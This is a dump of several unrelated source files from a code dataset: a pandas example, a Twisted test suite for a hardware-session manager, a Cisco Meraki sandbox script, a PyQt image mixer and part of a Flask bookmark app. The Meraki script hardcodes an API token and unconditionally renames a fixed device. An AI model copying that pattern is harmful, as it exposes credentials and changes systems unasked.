np\nimport pandas as pd\nd = {'A': [1,2,np.nan], 'B': [5,np.nan,np.nan],'C': [1,2,3]}\ndf = pd.DataFrame(d)\n\n#dropna method\ndf.dropna(axis=1) #drop columns with null values\n\n#dropna with thresh \n#passing thresh value to determine which row to drop\n#i.e: thresh = 2 will see if a row has at least 2 non-NA values\ndf.dropna(thresh=2)\n\n#fill method (replace missing value)\ndf.fillna(value='FILL VALUE')\ndf['A'].fillna(value=df['A'].mean()) #fill na values in column A\n","repo_name":"hdoan0503/Data-Science","sub_path":"MissingData.py","file_name":"MissingData.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33389874","text":"# Import required modules\nimport logging, time\nfrom twisted.internet import defer\nfrom twisted.trial import unittest\nfrom mock import MagicMock\nfrom hwm.sessions import schedule, session\nfrom hwm.core.configuration import *\nfrom hwm.hardware.pipelines import pipeline, manager as pipeline_manager\nfrom hwm.hardware.devices import manager as device_manager\nfrom hwm.hardware.devices.drivers import driver\nfrom hwm.command import parser, command\nfrom hwm.command.handlers import system as command_handler\nfrom hwm.network.security import permissions\nfrom pkg_resources import Requirement, resource_filename\nfrom hwm.sessions.tests.utilities import *\n\nclass TestSession(unittest.TestCase):\n \"\"\" This test suite is used to test the functionality of the Session class, which is used to represent user hardware\n pipeline reservations.\n \"\"\"\n\n def setUp(self):\n # Set a local reference to Configuration (how other modules should typically access Config)\n self.config = Configuration\n self.config.verbose_startup = False\n \n # Set the source data directory\n self.source_data_directory = resource_filename(Requirement.parse(\"Mercury2HWM\"),\"hwm\")\n \n # Create a valid command parser and device manager for testing\n self.config.read_configuration(self.source_data_directory+'/hardware/devices/tests/data/devices_configuration_valid.yml')\n self.config.read_configuration(self.source_data_directory+'/hardware/pipelines/tests/data/pipeline_configuration_valid.yml')\n permission_manager = permissions.PermissionManager(self.source_data_directory+'/network/security/tests/data/test_permissions_valid.json', 3600)\n self.command_parser = parser.CommandParser([command_handler.SystemCommandHandler('system')], permission_manager)\n self.device_manager = device_manager.DeviceManager(self.command_parser)\n self.pipeline_manager = MagicMock()\n self.command_parser.pipeline_manager = self.pipeline_manager\n self.session_coordinator = MockSessionCoordinator(self.command_parser)\n \n # Disable logging for most events\n logging.disable(logging.CRITICAL)\n \n def tearDown(self):\n # Reset the recorded configuration values\n self._reset_config_entries()\n \n # Reset the configuration reference\n self.config = None\n \n # Reset the other resource references\n self.device_manager = None\n self.command_parser = None\n\n def test_writing_to_telemetry_protocol(self):\n \"\"\" Tests that the Session class can write telemetry data passed to it to its registered telemetry protocols. \n \"\"\"\n\n # First create a test pipeline\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Create some mock telemetry protocols and register them with the session\n test_telem_protocol = MagicMock()\n test_telem_protocol_2 = MagicMock()\n test_session.register_telemetry_protocol(test_telem_protocol)\n test_session.register_telemetry_protocol(test_telem_protocol_2)\n\n # Write a test telemetry datum and verify that the protocols were correctly called\n test_timestamp = int(time.time())\n test_session.write_telemetry(\"session_test\", \"test_stream\", test_timestamp, \"waffles\", test_header=True)\n test_telem_protocol.write_telemetry.assert_called_once_with(\"session_test\", \"test_stream\", test_timestamp, \n \"waffles\", binary=False, test_header=True)\n test_telem_protocol_2.write_telemetry.assert_called_once_with(\"session_test\", \"test_stream\", test_timestamp,\n \"waffles\", binary=False, test_header=True)\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_writing_to_output_protocol(self):\n \"\"\" This test verifies that the Session class can correctly pass pipeline output from the Pipeline class to its \n registered data protocols.\n \"\"\"\n\n # First create a test pipeline\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Create some mock data protocols and register them with the session\n test_data_protocol = MagicMock()\n test_data_protocol_2 = MagicMock()\n test_session.register_data_protocol(test_data_protocol)\n test_session.register_data_protocol(test_data_protocol_2)\n\n # Write some output data and verify that it was passed to the registered streams\n test_session.write_output(\"waffles\")\n test_data_protocol.write_output.assert_called_once_with(\"waffles\")\n test_data_protocol_2.write_output.assert_called_once_with(\"waffles\")\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_writing_to_input_stream(self):\n \"\"\" Checks that the Session class can correctly write input data that it receives to its associated pipeline.\n \"\"\"\n\n # First create a valid test pipeline and mock its write_to_pipeline() method\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n test_pipeline.write = MagicMock()\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Write data to the session and verify that it correctly handed it off to the pipeline\n test_session.write(\"waffles\")\n test_pipeline.write.assert_called_once_with(\"waffles\")\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_telemetry_protocol_registration(self):\n \"\"\" Verifies that the Session class can correctly register telemetry protocols. The Session class uses telemetry\n protocols to pass pipeline telemetry data to the end user.\n \"\"\"\n\n # First create a valid test pipeline\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Create and register some mock telemetry protocols\n test_telem_protocol = MagicMock()\n test_telem_protocol_2 = MagicMock()\n test_session.register_telemetry_protocol(test_telem_protocol)\n test_session.register_telemetry_protocol(test_telem_protocol_2)\n\n # Try to register the same protocol twice\n self.assertRaises(session.ProtocolAlreadyRegistered, test_session.register_telemetry_protocol, test_telem_protocol)\n\n # Make sure the protocols were added successfully\n self.assertEqual(test_session.telemetry_protocols[0], test_telem_protocol)\n self.assertEqual(test_session.telemetry_protocols[1], test_telem_protocol_2)\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_data_protocol_registration(self):\n \"\"\" Verifies that the Session class can correctly register data protocols. The Session class uses these data\n protocols to pass the primary pipeline output stream to the end user.\n \"\"\"\n\n # First create a valid test pipeline\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Create and register some mock data protocols\n test_data_protocol = MagicMock()\n test_data_protocol_2 = MagicMock()\n test_session.register_data_protocol(test_data_protocol)\n test_session.register_data_protocol(test_data_protocol_2)\n\n # Try to register the same protocol twice\n self.assertRaises(session.ProtocolAlreadyRegistered, test_session.register_data_protocol, test_data_protocol)\n\n # Make sure both protocols were registered successfully\n self.assertEqual(test_session.data_protocols[0], test_data_protocol)\n self.assertEqual(test_session.data_protocols[1], test_data_protocol_2)\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_kill_session(self):\n \"\"\" Tests that sessions can be killed and that they notify their pipelines that the session has ended (to give them\n an opportunity to clean up their resources).\n \"\"\"\n\n # First create a pipeline to test with\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n test_pipeline.cleanup_after_session = MagicMock()\n test_pipeline.reserve_pipeline()\n self.assertTrue(test_pipeline.is_active)\n\n # Create a test session\n test_reservation_config = {\n \"reservation_id\": \"TEST_RES\",\n \"user_id\": \"1\"\n }\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Kill the session and make sure the session is in the correct state afterwards\n test_session.kill_session()\n test_pipeline.cleanup_after_session.assert_called_once_with()\n self.assertTrue(not test_pipeline.is_active)\n self.assertTrue(test_session.active_pipeline is None)\n\n def test_session_startup_pipeline_in_use(self):\n \"\"\" Makes sure that the Session class responds appropriately when a session's hardware pipeline can't be reserved.\n \"\"\"\n\n # First create a valid test pipeline and immediately lock it\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n test_pipeline.reserve_pipeline()\n\n # Define a callback to check the results of the session start procedure\n def check_results(session_start_failure):\n # Check if the correct error was generated (caused by a locked pipeline)\n self.assertTrue(isinstance(session_start_failure.value, pipeline.PipelineInUse))\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Start the session\n session_start_deferred = test_session.start_session()\n session_start_deferred.addErrback(check_results)\n\n return session_start_deferred\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_session_startup_pipeline_setup_command_errors(self):\n \"\"\" Tests that the Session class correctly handles fatal pipeline setup command errors when starting a new session.\n \"\"\"\n\n # First create a pipeline that contains invalid pipeline setup commands (to force an error)\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[2], self.device_manager, self.command_parser)\n\n # Create the expected mock services\n test_tracker_service = MagicMock()\n test_tracker_service.id = \"sgp4\"\n test_tracker_service.type = \"tracker\"\n test_pipeline.register_service(test_tracker_service)\n test_logger_service = MagicMock()\n test_logger_service.id = \"basic\"\n test_logger_service.type = \"logger\"\n test_pipeline.register_service(test_logger_service)\n\n # Define a callback to check the results of the session start procedure\n def check_results(session_start_failure, test_session):\n # Check if the correct error was generated (caused by a failed pipeline setup command)\n self.assertTrue(isinstance(session_start_failure.value, parser.CommandFailed))\n\n # Make sure the session is not active\n self.assertTrue(not test_session.is_active)\n\n # Make sure that the pipeline was freed after the error\n self.assertTrue(not test_pipeline.is_active)\n for temp_device in test_pipeline.devices:\n # Try to lock the devices, if this fails then something wasn't unlocked correctly\n test_pipeline.devices[temp_device].reserve_device()\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.5')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Start the session\n session_start_deferred = test_session.start_session()\n session_start_deferred.addErrback(check_results, test_session)\n\n return session_start_deferred\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_session_startup_error_during_device_session_preparation(self):\n \"\"\" Verifies that the session class can correctly handle errors that may occur during device prepare_for_session()\n method calls; such errors are supposed to be fatal to the session.\n \"\"\"\n\n # Create a mock method that will raise an error\n def mock_prepare_for_session(session_pipeline):\n raise TestSessionError\n\n # First create a pipeline to run the session on and replace some of its device's methods for testing\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n test_pipeline.devices[\"test_device4\"].prepare_for_session = mock_prepare_for_session\n\n # Define an errback to check the results of the session start procedure\n def check_results(session_start_failure):\n self.assertTrue(isinstance(session_start_failure.value, TestSessionError))\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.3')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Start the session\n session_start_deferred = test_session.start_session()\n session_start_deferred.addErrback(check_results)\n\n return session_start_deferred\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_session_startup_no_session_setup_commands(self):\n \"\"\" Tests that the Session class can correctly start a session that doesn't specify any session setup commands.\n \"\"\"\n\n # First create a pipeline to run the session on and replace some of its device's methods for testing\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n for device_id in test_pipeline.devices:\n test_pipeline.devices[device_id].prepare_for_session = MagicMock()\n\n # Define a callback to check the results of the session start procedure\n def check_results(session_start_results, test_session):\n self.assertEqual(session_start_results, None)\n\n # Verify that the prepare_for_session() method was called on each of the pipeline's devices\n for device_id in test_pipeline.devices:\n test_pipeline.devices[device_id].prepare_for_session.assert_called_once_with(test_pipeline)\n\n # Make sure the session is active\n self.assertTrue(test_session.is_active)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.3')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Start the session\n session_start_deferred = test_session.start_session()\n session_start_deferred.addCallback(check_results, test_session)\n\n return session_start_deferred\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_session_startup_setup_commands_mixed_success(self):\n \"\"\" Tests that the Session class can correctly start a session based on a reservation that specifies some valid, and\n invalid, session setup commands. Because session setup command errors are considered non-fatal, invalid commands \n should still leave the session in a running state. This test also verifies that the session: \n * Correctly registers itself with its pipeline (which occurs right before the session setup commands are executed)\n * Successfully executes a valid device command that requires a session for the test pipeline.\n * Fails to execute a device command that specifies a device the user doesn't have permission to execute.\n \"\"\"\n\n # Setup the pipeline manager and load the test pipeline\n self.pipeline_manager = pipeline_manager.PipelineManager(self.device_manager, self.command_parser)\n test_pipeline = self.pipeline_manager.get_pipeline(\"test_pipeline\")\n\n # Define a callback to check the results of the session start procedure\n def check_results(session_start_results, test_session):\n # Make sure that the session registered itself with its pipeline\n self.assertTrue(test_pipeline.current_session is test_session)\n\n # Make sure that the first setup command correctly executed\n self.assertTrue(session_start_results[0][0])\n self.assertTrue('timestamp' in session_start_results[0][1]['response']['result'])\n\n # Make sure that the second command failed as expected\n self.assertTrue(not session_start_results[1][0])\n self.assertTrue(isinstance(session_start_results[1][1].value, parser.CommandFailed))\n\n # Make sure that the third command (a valid device command) executed correctly\n self.assertTrue(session_start_results[2][0])\n self.assertTrue('some_results' in session_start_results[2][1]['response']['result'])\n\n # Make sure that the fourth command (a device command that the user doesn't have permission for) didn't execute\n self.assertTrue(not session_start_results[3][0])\n self.assertTrue(isinstance(session_start_results[3][1].value, parser.CommandFailed))\n\n # Make sure the session is active\n self.assertTrue(test_session.is_active)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Load the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Start the session\n session_start_deferred = test_session.start_session()\n session_start_deferred.addCallback(check_results, test_session)\n\n return session_start_deferred\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def _load_test_schedule(self):\n \"\"\" Loads a valid test schedule and returns a deferred that will be fired once that schedule has been loaded and \n parsed. This schedule is used to test the Session class.\n \"\"\"\n\n # Load a valid test schedule\n schedule_manager = schedule.ScheduleManager(self.source_data_directory+'/sessions/tests/data/test_schedule_valid.json')\n schedule_update_deferred = schedule_manager.update_schedule()\n\n return schedule_update_deferred\n\n def _load_reservation_config(self, reservation_schedule, reservation_id):\n \"\"\" Returns the configuration dictionary for the specified reservation ID from the complete reservation schedule.\n This is used to pick out individual session configurations to test with.\n\n @throw Raises LookupError if the specified reservation ID can't be found in the reservation schedule.\n \"\"\"\n\n # Parse out the specific reservation configuration\n test_reservation_config = None\n for temp_reservation in reservation_schedule['reservations']:\n if temp_reservation['reservation_id'] == reservation_id:\n test_reservation_config = temp_reservation\n return test_reservation_config\n\n raise LookupError(\"Specified reservation '\"+reservation_id+\"' was not found in the provided reservation schedule.\")\n\n def _reset_config_entries(self):\n # Reset the recorded configuration entries\n self.config.options = {}\n self.config.user_options = {}\n\nclass TestSessionError(Exception):\n pass\n","repo_name":"MichiganExplorationLab/Mercury2-HWM","sub_path":"hwm/sessions/tests/test_session.py","file_name":"test_session.py","file_ext":"py","file_size_in_byte":23129,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"13467117993","text":"\"\"\"\nThis Example Focuses on Cisco Meraki via the sandbox at\nhttps://devnetsandbox.cisco.com/RM/Diagram/Index/f381be67-d43c-4fc7-977d-0979b04d64cd\nObjective:\n Utilize the platform via the meraki sdk\n\"\"\"\n\nimport meraki\nimport json\nfrom pprint import pprint\n\nauth_token = \"02a3afda271cb9f7106265011bb49f216880332c\"\n\ndashboard_api = meraki.DashboardAPI(auth_token)\n\n\ndef get_org_list():\n organizations = dashboard_api.organizations.getOrganizations()\n return organizations\n\n\ndef get_org_networks(org_id):\n org_networks = dashboard_api.organizations.getOrganizationNetworks(organizationId=org_id)\n return org_networks\n\n\ndef get_network_devices(network_id):\n net_devs = dashboard_api.networks.getNetworkDevices(network_id)\n return net_devs\n\n\ndef display_all_devices(networks):\n for value in networks:\n print(f'value[\"name]\\n')\n devices = get_network_devices(value['id'])\n pprint(devices)\n return\n\n\ndef update_net(net_id, name):\n update = dashboard_api.networks.updateNetwork(networkId=net_id, name=name)\n return update\n\n\ndef update_net_dev(net_id, serial):\n update = dashboard_api.devices.updateDevice(\n 'Q2HP-Q9S8-BVHB',\n name=\"SWITCH_12_28\",\n tags=['Test1', 'Test2']\n )\n return update\n\n\ndef get_device_lldp_cdp(serial):\n data = dashboard_api.devices.getDeviceLldpCdp(serial=serial)\n pprint(data)\n return\n\n\ndef main():\n org_id = get_org_list()[0]['id']\n org_networks = get_org_networks(org_id)\n update_net_dev(None, None)\n for value in org_networks:\n if value['name'] == 'TheBoys':\n devices = get_network_devices(value['id'])\n # update_net(value['id'], \"TheBoys\")\n # update_net_dev(value['id'], value['serial'])\n pprint(devices)\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MFalaqIqbal/DevNet_learning","sub_path":"devnet_code/3.0_Cisco_Platforms_and_Development/Cisco Meraki/example_2.py","file_name":"example_2.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"25484499376","text":"from PyQt5.QtWidgets import QFileDialog, QLabel, QMessageBox\nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom ImgModel import ImageModel\nfrom Modes import Modes\nimport numpy as np\nimport logging\nimport UI\nimport sys\nimport cv2\n\n# Create and configure logger\nlogging.basicConfig(level=logging.DEBUG,\n filename=\"app.log\",\n format='%(lineno)s - %(levelname)s - %(message)s',\n filemode='w')\n# Creating an object\nlogger = logging.getLogger()\n\nclass ImageMixer(UI.Ui_MainWindow):\n\n def __init__(self,MainWindow):\n super(ImageMixer,self).setupUi(MainWindow) \n \n def open(self, flag):\n \n logger.info(\"Browsing the files...\")\n repo_path = \"images\"\n self.filepath[flag], _ = QtWidgets.QFileDialog.getOpenFileName(None, \"Load Image\", repo_path,\n \"*.jpg;;\" \"*.jpeg;;\" \"*.png;;\")\n self.path = self.filepath[flag]\n logger.info(\"Image\"+str(flag+1)+\" opened correctly\")\n self.img = cv2.cvtColor(cv2.imread(self.path), cv2.COLOR_BGR2GRAY)\n self.images[flag] = ImageModel(self.path)\n self.showComponent[flag].setCurrentIndex(0)\n self.img_viewers[flag+2].clear()\n self.view_image(self.img, flag)\n self.check_size()\n logger.info(\"Image\"+str(flag+1)+\" is ploted\")\n\n\n def check_size(self):\n if self.images[0] != [] and self.images[1] != []:\n if self.images[0].imgShape != self.images[1].imgShape:\n self.enable(False)\n msg = QMessageBox()\n msg.setWindowTitle(\"Warning\")\n msg.setText(\"The two images are of different size\")\n logger.warning(\"The two images are of different size\")\n msg.setIcon(QMessageBox.Warning)\n msg.exec_()\n else:\n self.enable(True)\n\n def view_image(self, data, imgflag):\n self.img_viewers[imgflag].setImage((data).T)\n self.img_viewers[imgflag].view.setRange(xRange=[0, self.images[0].imgShape[0]], yRange=[0, self.images[0].imgShape[1]],\n padding=0)\n self.img_viewers[imgflag].view.setAspectLocked(False)\n logger.info(\"Data is ploted\")\n\n def img_options(self, imgflag):\n if self.showComponent[imgflag].currentText() == \"Magnitude\":\n self.data = self.images[imgflag].magnitude2\n logger.info(\"Magnitude has been selected\")\n elif self.showComponent[imgflag].currentText() == \"Phase\":\n self.data = self.images[imgflag].phase\n logger.info(\"Phase has been selected\")\n elif self.showComponent[imgflag].currentText() == \"Real\":\n self.data = self.images[imgflag].real2\n logger.info(\"Real has been selected\")\n elif self.showComponent[imgflag].currentText() == \"Imaginary\":\n self.data = self.images[imgflag].imaginary\n logger.info(\"Imaginary has been selected\")\n else:\n logger.warning(\"No component has been selected\") \n self.view_image(self.data, imgflag+2)\n\n def mix_options(self, flag=0):\n for n in range(2):\n self.Percentage[n].setText(\"{}%\".format(self.sliders[n].value()))\n self.Data = []\n if flag==1:\n self.comboxox_setitems()\n for i in range(2):\n if self.combobox_mixer[self.image_no[i]].currentText() == \"Magnitude\" and self.combobox_mixer[not(self.image_no[i])].currentText() == \"Phase\":\n self.Data = self.images[self.image_no[i]].mix(self.images[not(\n self.image_no[i])], self.sliders[i].value(), self.sliders[not(i)].value(), Modes.magnitude_Phase)\n logger.info(\"Mix magnitude of image\"+str(\n self.image_no[i]+1)+\" and phase of image\" + str((self.image_no[not(i)])+1))\n\n elif self.combobox_mixer[self.image_no[i]].currentText() == \"Real\" and self.combobox_mixer[not(self.image_no[i])].currentText() == \"Imaginary\":\n self.Data = self.images[self.image_no[i]].mix(self.images[not(\n self.image_no[i])], self.sliders[self.image_no[i]].value(),\n self.sliders[not(self.image_no[i])].value(), Modes.real_Imaginary)\n logger.info(\"Mix real of image\"+str(\n self.image_no[i]+1)+\" and Imaginary of image\" + str((self.image_no[not(i)])+1))\n\n elif self.combobox_mixer[self.image_no[i]].currentText() == \"Magnitude\" and self.combobox_mixer[not(self.image_no[i])].currentText() == \"Uni Phase\":\n self.Data = self.images[self.image_no[i]].mix(self.images[not(\n self.image_no[i])], self.sliders[self.image_no[i]].value(),\n self.sliders[not(self.image_no[i])].value(), Modes.magnitude_UniPhase)\n logger.info(\"Mix magnitude of image\"+str(\n self.image_no[i]+1)+\" and uniphase of image\" + str((self.image_no[not(i)])+1))\n\n elif self.combobox_mixer[self.image_no[i]].currentText() == \"Uni Magnitude\" and self.combobox_mixer[not(self.image_no[i])].currentText() == \"Phase\":\n self.Data = self.images[self.image_no[i]].mix(self.images[not(\n self.image_no[i])], self.sliders[self.image_no[i]].value(),\n self.sliders[1].value(), Modes.Unimagnitude_Phase)\n logger.info(\"Mix unimagnitude of image\"+str(\n self.image_no[i]+1)+\" and phase of image\" + str((self.image_no[not(i)])+1))\n\n elif self.combobox_mixer[self.image_no[i]].currentText() == \"Uni Magnitude\" and self.combobox_mixer[not(self.image_no[i])].currentText() == \"Uni Phase\":\n self.Data = self.images[self.image_no[i]].mix(self.images[not(\n self.image_no[i])], self.sliders[self.image_no[i]].value(),\n self.sliders[1].value(), Modes.uniMag_uniPhase)\n logger.info(\"Mix unimagnitude of image\"+str(\n self.image_no[i]+1)+\" and uniphase of image\" + str((self.image_no[not(i)])+1))\n\n else:\n logger.warning(\"Unavailable Mode\")\n\n if len(self.Data) > 0:\n self.view_image(self.Data, self.output_no+4)\n logger.info(\"Mode is selected\")\n else:\n logger.warning(\"No Mode is selected\")\n\n def Mixer_img(self, boxflag):\n if self.Select_image[boxflag].currentText() == \"Image 1\":\n self.image_no[boxflag] = 0\n logger.info(\"Image1 is selected as input\"+str(boxflag+1))\n if self.Select_image[boxflag].currentText() == \"Image 2\":\n self.image_no[boxflag] = 1\n logger.info(\"Image is selected as input\"+str(boxflag+1))\n\n def output_img(self):\n if self.output.currentText() == \"Output 1\":\n self.output_no = 0\n logger.info(\"Display mixed image in output1\")\n if self.output.currentText() == \"Output 2\":\n self.output_no = 1\n logger.info(\"Display mixed image in output2\")\n\n def comboxox_setitems(self):\n self.combobox_mixer[1].clear()\n if self.combobox_mixer[0].currentText() == \"Magnitude\" or self.combobox_mixer[0].currentText() == \"Uni Magnitude\":\n self.combobox_mixer[1].addItem(\"Phase\")\n self.combobox_mixer[1].addItem(\"Uni Phase\")\n elif self.combobox_mixer[0].currentText() == \"Phase\" or self.combobox_mixer[0].currentText() == \"Uni Phase\":\n self.combobox_mixer[1].addItem(\"Magnitude\")\n self.combobox_mixer[1].addItem(\"Uni Magnitude\")\n elif self.combobox_mixer[0].currentText() == \"Real\":\n self.combobox_mixer[1].addItem(\"Imaginary\")\n elif self.combobox_mixer[0].currentText() == \"Imaginary\":\n self.combobox_mixer[1].addItem(\"Real\")\n logger.info(\"Combobox Itemtext changed\")\n\n\ndef main():\n \"\"\"\n the application startup functions\n :return:\n \"\"\"\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = ImageMixer(MainWindow)\n MainWindow.show()\n\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"Youssef-Elkaheil/Task-3","sub_path":"Part A/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43550031036","text":"# do strukturojme aplikacionin pranda krijojme folderin src\n# folderi src do mbaje gjithe source code\n# -> config do mbaje database configurations, te gjitha modelet me te cilat do punojme\n# -> constants do mbaje disa variabla qe nuk duam ti ndryshojme\n# -> static do mbaje file si css, images, js etj\n# -> templates do mbaje filet html\n# -> services do mbaje konfigurimet per sherbimet si psh: email service etj\n# -> tests do mbaje testet si psh unittest\n# blueprints are meant to group related functionality together\n\n\nimport os\n\nfrom flask import Flask, redirect\nfrom flask.json import jsonify\nfrom src.auth import auth\nfrom src.bookmark import bookmark\nfrom src.database import db, Bookmark\nfrom flask_jwt_extended import JWTManager\nfrom src.constants.http_status_codes import HTTP_404_NOT_FOUND, HTTP_500_INTERNAL_SERVER_ERROR\nfrom flasgger import Swagger, swag_from # swag_from create a yaml file\nfrom src.config.swagger import template, swagger_config\n\n\n# ky factory function do krijoje aplikacionin dhe do percaktoje disa konfigurime si dhe do migroje tabelat ne database\ndef create_app(test_config=None):\n\n # ky parameter i thote Flask-ut se kemi disa konfigurime\n app = Flask(__name__, instance_relative_config=True)\n\n # pra nqs nuk do kemi konfigurime atehere i percaktojme konfigurimet\n if test_config is None:\n\n # update-ojme konfigurimet me kete funksion\n app.config.from_mapping(SECRET_KEY=os.getenv('SECRET_KEY'),\n SQLALCHEMY_DATABASE_URI=os.getenv('SQLALCHEMY_DATABASE_URI'),\n SQLALCHEMY_TRACK_MODIFICATIONS=os.getenv('SQLALCHEMY_TRACK_MODIFICATIONS'),\n FLASK_APP=os.environ.get('FLASK_APP'),\n JWT_SECRET_KEY=os.getenv('JWT_SECRET_KEY'),\n SWAGGER={\n \"title\": \"Bookmark\",\n \"uiversion\":3\n })\n\n else:\n # nqs i ka konfigurimet atehere merri nga parametri test_config\n app.config.from_mapping(test_config)\n\n # pasi krijuam blueprints i rregjistrojme\n app.register_blueprint(auth)\n app.register_blueprint(bookmark)\n\n # Kur te kthejme app-in do kemi jwt manager te konfiguaruar\n JWTManager(app) # encrypt and decrypt Tokens\n\n Swagger(app, config=swagger_config, template=template)\n\n # do rregjistrojme db\n db.app = app\n db.init_app(app)\n\n # qe te funksionojne \"gjerat\" i percaktojme keto funksione create_app() dhe e bejme folderin src entry point\n @app.route('/index')\n @app.route('/')\n def index():\n return \"Hello World\"\n\n @app.route('/hello')\n def say_hello():\n return {'hello': 'world'}\n\n # krijojme kete view function qe do numeroje vizitat te short url dhe do na ridrejtoje te url\n @app.route('/', methods=['GET'])\n @swag_from(\"./docs/bookmark/short_url.yaml\")\n def redirect_to_url(short_url):\n bookmark = Bookmark.query.filter_by(short_url=short_url).first_or_404()\n\n if bookmark:\n bookmark.visits += 1\n db.session.commit()\n\n return redirect(bookmark.url)\n\n @app.errorhandler(HTTP_404_NOT_FOUND)\n def handle_404(e): # sa here krijojme nje error handler duhet te kalojme si argument nje exception\n return jsonify({\n \"Message\": \"Error 404! Page not found!\"\n }), HTTP_404_NOT_FOUND\n\n\n @app.errorhandler(HTTP_500_INTERNAL_SERVER_ERROR)\n def handle_500(e):\n return jsonify({\n \"Message\": 